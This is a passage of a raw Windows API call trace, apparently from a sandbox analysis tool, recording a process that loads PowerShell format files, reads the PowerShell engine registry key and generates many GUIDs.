[6]=0x1b, [7]=0xb1))) returned 0x0 [0091.522] SetErrorMode (uMode=0x1) returned 0x1 [0091.522] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310 [0091.523] SetErrorMode (uMode=0x1) returned 0x1 [0091.523] GetFileType (hFile=0x310) returned 0x1 [0091.523] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.524] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.524] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.524] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.525] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.525] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.525] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.525] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.525] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.527] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.528] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.528] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.528] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.529] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.529] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.529] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.530] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.533] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.533] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.534] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.534] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.534] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0xe67, lpOverlapped=0x0) returned 1 [0091.535] ReadFile (in: hFile=0x310, lpBuffer=0x35816e7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35816e7*, lpNumberOfBytesRead=0x16d498*=0x0, lpOverlapped=0x0) returned 1 [0091.535] ReadFile (in: hFile=0x310, lpBuffer=0x3582118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3582118*, lpNumberOfBytesRead=0x16d498*=0x0, lpOverlapped=0x0) returned 1 [0091.536] SetErrorMode (uMode=0x1) returned 0x1 [0091.536] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d440 | out: lpFileInformation=0x16d440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0091.536] SetErrorMode (uMode=0x1) returned 0x1 [0091.536] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d528 | out: phkResult=0x16d528*=0x310) returned 0x0 [0091.536] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d4ac, lpData=0x0, lpcbData=0x16d4a8*=0x0 | out: lpType=0x16d4ac*=0x1, lpData=0x0, lpcbData=0x16d4a8*=0x56) returned 0x0 [0091.536] CoTaskMemAlloc (cb=0x5a) returned 0x30bea0 [0091.536] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d47c, lpData=0x30bea0, lpcbData=0x16d478*=0x56 | out: lpType=0x16d47c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d478*=0x56) returned 0x0 [0091.536] CoTaskMemFree (pv=0x30bea0) [0091.537] RegCloseKey (hKey=0x310) returned 0x0 [0091.538] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x891802c4, Data2=0x3089, Data3=0x4614, Data4=([0]=0xac, [1]=0x31, [2]=0x18, [3]=0xb2, [4]=0x5b, [5]=0x45, [6]=0xa9, [7]=0xe7))) returned 0x0 [0091.538] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x3d7f7526, Data2=0x5d72, Data3=0x4066, Data4=([0]=0x8b, [1]=0xc5, [2]=0x8, [3]=0x12, [4]=0x9d, [5]=0xd, [6]=0x42, [7]=0x80))) returned 0x0 [0091.539] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xb8b660bd, Data2=0xe7b9, Data3=0x45bf, Data4=([0]=0x9c, [1]=0xc8, [2]=0x9e, [3]=0x17, [4]=0x65, [5]=0x79, [6]=0x4d, [7]=0x69))) returned 0x0 [0091.539] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x13cc5dc1, Data2=0xeb8b, Data3=0x4440, Data4=([0]=0x95, [1]=0xac, [2]=0x7b, [3]=0xdf, [4]=0x45, [5]=0xb6, [6]=0x2f, [7]=0x5f))) returned 0x0 [0091.539] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x74217b1d, Data2=0xa0e6, Data3=0x4bb3, Data4=([0]=0xb2, [1]=0x9f, [2]=0x83, [3]=0x89, [4]=0x4d, [5]=0x97, [6]=0x5, [7]=0x24))) returned 0x0 [0091.539] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xb65b4b8e, Data2=0xf0a1, Data3=0x4b83, Data4=([0]=0x82, [1]=0x58, [2]=0x90, [3]=0x5d, [4]=0x37, [5]=0xb2, [6]=0xa8, [7]=0x3b))) returned 0x0 [0091.539] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xdd90c850, Data2=0x6842, Data3=0x4cde, Data4=([0]=0x8d, [1]=0xb2, [2]=0x8f, [3]=0xef, [4]=0x1c, [5]=0x71, [6]=0x1d, [7]=0x6))) returned 0x0 [0091.539] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.540] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x49b2a1ab, Data2=0xed2a, Data3=0x4359, Data4=([0]=0x85, [1]=0xd, [2]=0x9f, [3]=0xad, [4]=0x24, [5]=0x0, [6]=0x3e, [7]=0xbb))) returned 0x0 [0091.540] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x4c942c48, Data2=0x1f72, Data3=0x49e2, Data4=([0]=0xb3, [1]=0xdd, [2]=0xa6, [3]=0x53, [4]=0xff, [5]=0x8, [6]=0x8d, [7]=0xfb))) returned 0x0 [0091.540] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x6c3a5a18, Data2=0xe359, Data3=0x4c24, Data4=([0]=0xbb, [1]=0xe7, [2]=0x9d, [3]=0xac, [4]=0x69, [5]=0x53, [6]=0x34, [7]=0x70))) returned 0x0 [0091.540] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xd78bd, Data2=0x61a5, Data3=0x4664, Data4=([0]=0x94, [1]=0x42, [2]=0x2, [3]=0xe1, [4]=0xb9, [5]=0xfc, [6]=0xfa, [7]=0xd6))) returned 0x0 [0091.540] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xd440052a, Data2=0x53d4, Data3=0x4a30, Data4=([0]=0x9f, [1]=0xc7, [2]=0x44, [3]=0x3c, [4]=0x8b, [5]=0x16, [6]=0xa1, [7]=0xb4))) returned 0x0 [0091.540] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x56cf9baf, Data2=0xdaa1, Data3=0x4d9a, Data4=([0]=0xb2, [1]=0xbe, [2]=0x15, [3]=0x38, [4]=0xa3, [5]=0x5d, [6]=0xfa, [7]=0x19))) returned 0x0 [0091.540] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x4ac19405, Data2=0x7f0b, Data3=0x4fe5, Data4=([0]=0x8d, [1]=0xf9, [2]=0x5e, [3]=0xef, [4]=0x8e, [5]=0x24, [6]=0x61, [7]=0xc6))) returned 0x0 [0091.541] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x5e2404f6, Data2=0xb46d, Data3=0x4cab, Data4=([0]=0x9f, [1]=0x44, [2]=0x22, [3]=0xd, [4]=0x4b, [5]=0xbc, [6]=0x2a, [7]=0xa6))) returned 0x0 [0091.541] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xeb1e7466, Data2=0x681f, Data3=0x4d6e, Data4=([0]=0xaa, [1]=0xca, [2]=0x1f, [3]=0xca, [4]=0x8, [5]=0x9b, [6]=0x4b, [7]=0x91))) returned 0x0 [0091.541] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xc0ab2b18, Data2=0x605d, Data3=0x47bf, Data4=([0]=0xb3, [1]=0xe6, [2]=0x41, [3]=0x91, [4]=0xdb, [5]=0xd2, [6]=0x0, [7]=0x3e))) returned 0x0 [0091.541] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xbf1d4044, Data2=0x8e7c, Data3=0x4fea, Data4=([0]=0xaa, [1]=0x31, [2]=0xba, [3]=0xcf, [4]=0x72, [5]=0xb0, [6]=0x14, [7]=0x86))) returned 0x0 [0091.541] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x226a10aa, Data2=0x8214, Data3=0x4681, Data4=([0]=0x82, [1]=0x1e, [2]=0x5, [3]=0xa6, [4]=0x1b, [5]=0xcd, [6]=0x6c, [7]=0x94))) returned 0x0 [0091.541] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.542] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.542] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.542] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x15528208, Data2=0x360d, Data3=0x420c, Data4=([0]=0x91, [1]=0xef, [2]=0xba, [3]=0xac, [4]=0x13, [5]=0x56, [6]=0x15, [7]=0x27))) returned 0x0 [0091.542] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x1421ea20, Data2=0xf20d, Data3=0x401d, Data4=([0]=0x92, [1]=0x8d, [2]=0x4a, [3]=0xf4, [4]=0xe8, [5]=0x3a, [6]=0x6e, [7]=0xae))) returned 0x0 [0091.542] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x524ccd14, Data2=0xc51, Data3=0x4807, Data4=([0]=0xa1, [1]=0x46, [2]=0x92, [3]=0xc1, [4]=0xa, [5]=0xcf, [6]=0x2c, [7]=0x61))) returned 0x0 [0091.542] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x9a152cc3, Data2=0xceee, Data3=0x4f70, Data4=([0]=0x89, [1]=0xf1, [2]=0x3, [3]=0xb8, [4]=0x7f, [5]=0x74, [6]=0x52, [7]=0x5c))) returned 0x0 [0091.542] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x6c269517, Data2=0x50c9, Data3=0x49f6, Data4=([0]=0x83, [1]=0x63, [2]=0x8c, [3]=0x21, [4]=0xad, [5]=0xc4, [6]=0xa4, [7]=0x64))) returned 0x0 [0091.543] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x6e157038, Data2=0xeb6a, Data3=0x4254, Data4=([0]=0xb5, [1]=0xd7, [2]=0x9f, [3]=0x6f, [4]=0x17, [5]=0x46, [6]=0xf4, [7]=0x7c))) returned 0x0 [0091.543] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xc3e1537f, Data2=0x84cb, Data3=0x4be2, Data4=([0]=0xbf, [1]=0x8f, [2]=0xcf, [3]=0x8e, [4]=0x18, [5]=0xfb, [6]=0xb4, [7]=0xe2))) returned 0x0 [0091.543] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x9e70588d, Data2=0x154e, Data3=0x4bf3, Data4=([0]=0xa9, [1]=0x7e, [2]=0x6, [3]=0x9e, [4]=0x86, [5]=0xf4, [6]=0x29, [7]=0x1a))) returned 0x0 [0091.543] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x307f279e, Data2=0x4bdb, Data3=0x4cb4, Data4=([0]=0x8f, [1]=0xa2, [2]=0x75, [3]=0x59, [4]=0x3a, [5]=0xd7, [6]=0xff, [7]=0xa5))) returned 0x0 [0091.543] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x61ad6412, Data2=0xf4e7, Data3=0x46f9, Data4=([0]=0x9c, [1]=0x28, [2]=0xa6, [3]=0x82, [4]=0x20, [5]=0xb8, [6]=0xf, [7]=0x29))) returned 0x0 [0091.543] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xc19057b7, Data2=0x393e, Data3=0x4b5a, Data4=([0]=0xa4, [1]=0xba, [2]=0x28, [3]=0x9f, [4]=0xa3, [5]=0xb8, [6]=0xd6, [7]=0x89))) returned 0x0 [0091.543] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xff6402ba, Data2=0x46c5, Data3=0x4a3d, Data4=([0]=0xb9, [1]=0x76, [2]=0x2a, [3]=0x93, [4]=0x6f, [5]=0x4d, [6]=0x0, [7]=0x2e))) returned 0x0 [0091.544] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x7659717f, Data2=0xb08f, Data3=0x4678, Data4=([0]=0x93, [1]=0x5, [2]=0x63, [3]=0xcb, [4]=0x8a, [5]=0xa8, [6]=0x8d, [7]=0x45))) returned 0x0 [0091.544] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.544] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x2c5a6ce4, Data2=0xff51, Data3=0x48fa, Data4=([0]=0x9d, [1]=0xeb, [2]=0xff, [3]=0xd1, [4]=0xe7, [5]=0x61, [6]=0x5b, [7]=0xb1))) returned 0x0 [0091.544] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.551] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.553] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x764efd3d, Data2=0xe01f, Data3=0x4191, Data4=([0]=0x8e, [1]=0xfd, [2]=0x35, [3]=0x8b, [4]=0x5d, [5]=0xa1, [6]=0x59, [7]=0x83))) returned 0x0 [0091.553] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.553] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xc1d0a23c, Data2=0x5507, Data3=0x42cd, Data4=([0]=0x83, [1]=0x80, [2]=0x5e, [3]=0x9e, [4]=0x74, [5]=0xeb, [6]=0xab, [7]=0xe1))) returned 0x0 [0091.553] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x10424c77, Data2=0x9fb1, Data3=0x4d7f, Data4=([0]=0xb0, [1]=0x36, [2]=0xb4, [3]=0x11, [4]=0xb3, [5]=0x70, [6]=0x10, [7]=0xf7))) returned 0x0 [0091.554] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x1c1042b8, Data2=0xeaba, Data3=0x4cc9, Data4=([0]=0x83, [1]=0x7, [2]=0xc1, [3]=0x8, [4]=0xd5, [5]=0xd9, [6]=0xba, [7]=0x8b))) returned 0x0 [0091.554] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x89e1e27, Data2=0xdbe, Data3=0x449b, Data4=([0]=0x91, [1]=0xf8, [2]=0x44, [3]=0xc6, [4]=0x8e, [5]=0x8d, [6]=0x62, [7]=0x33))) returned 0x0 [0091.554] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xafccaf48, Data2=0x86b5, Data3=0x48cf, Data4=([0]=0xb7, [1]=0xd, [2]=0x14, [3]=0x6b, [4]=0xf3, [5]=0xca, [6]=0x1a, [7]=0x6f))) returned 0x0 [0091.554] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x9d092f0, Data2=0xa691, Data3=0x4914, Data4=([0]=0xbf, [1]=0xba, [2]=0xda, [3]=0xd2, [4]=0xed, [5]=0xa0, [6]=0x2f, [7]=0xa6))) returned 0x0 [0091.554] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x8e06a1be, Data2=0xad1d, Data3=0x451a, Data4=([0]=0xb5, [1]=0xd2, [2]=0x97, [3]=0x97, [4]=0xfd, [5]=0x88, [6]=0x18, [7]=0x34))) returned 0x0 [0091.554] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.555] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x635e5c97, Data2=0xfeaa, Data3=0x42ac, Data4=([0]=0x86, [1]=0x4, [2]=0x92, [3]=0xb7, [4]=0x15, [5]=0x2d, [6]=0x79, [7]=0x16))) returned 0x0 [0091.555] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x17588d6b, Data2=0x65d5, Data3=0x4099, Data4=([0]=0x81, [1]=0xd1, [2]=0x50, [3]=0x17, [4]=0x5a, [5]=0x5, [6]=0xf0, [7]=0xd8))) returned 0x0 [0091.555] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x489a4d78, Data2=0x95bb, Data3=0x4f90, Data4=([0]=0x88, [1]=0x51, [2]=0x75, [3]=0xdb, [4]=0xe7, [5]=0x54, [6]=0xef, [7]=0x4f))) returned 0x0 [0091.555] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x1caa41d1, Data2=0xcf91, Data3=0x426f, Data4=([0]=0xa7, [1]=0xd2, [2]=0x54, [3]=0xcd, [4]=0xf5, [5]=0xc5, [6]=0x49, [7]=0x78))) returned 0x0 [0091.555] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xe0796b73, Data2=0xf68d, Data3=0x417f, Data4=([0]=0xb6, [1]=0xe, [2]=0x16, [3]=0xd0, [4]=0xc4, [5]=0x6c, [6]=0x21, [7]=0x2f))) returned 0x0 [0091.555] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.555] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x5df84678, Data2=0x2270, Data3=0x4a27, Data4=([0]=0x94, [1]=0x10, [2]=0x94, [3]=0xd5, [4]=0x60, [5]=0xf8, [6]=0x8b, [7]=0x82))) returned 0x0 [0091.556] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x1399aeec, Data2=0x2d91, Data3=0x430b, Data4=([0]=0x9f, [1]=0x5a, [2]=0x6a, [3]=0xc5, [4]=0x6a, [5]=0x8b, [6]=0x9e, [7]=0xfc))) returned 0x0 [0091.556] VirtualQuery (in: lpAddress=0x16c170, lpBuffer=0x16d030, dwLength=0x30 | out: lpBuffer=0x16d030*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.556] VirtualQuery (in: lpAddress=0x16c170, lpBuffer=0x16d030, dwLength=0x30 | out: lpBuffer=0x16d030*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.556] VirtualQuery (in: lpAddress=0x16c170, lpBuffer=0x16d030, dwLength=0x30 | out: lpBuffer=0x16d030*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.556] VirtualQuery (in: lpAddress=0x16c170, lpBuffer=0x16d030, dwLength=0x30 | out: lpBuffer=0x16d030*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.556] SetErrorMode (uMode=0x1) returned 0x1 [0091.556] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310 [0091.557] SetErrorMode (uMode=0x1) returned 0x1 [0091.557] GetFileType (hFile=0x310) returned 0x1 [0091.557] ReadFile (in: hFile=0x310, lpBuffer=0x36e0110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36e0110*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.558] ReadFile (in: hFile=0x310, lpBuffer=0x36e0110, 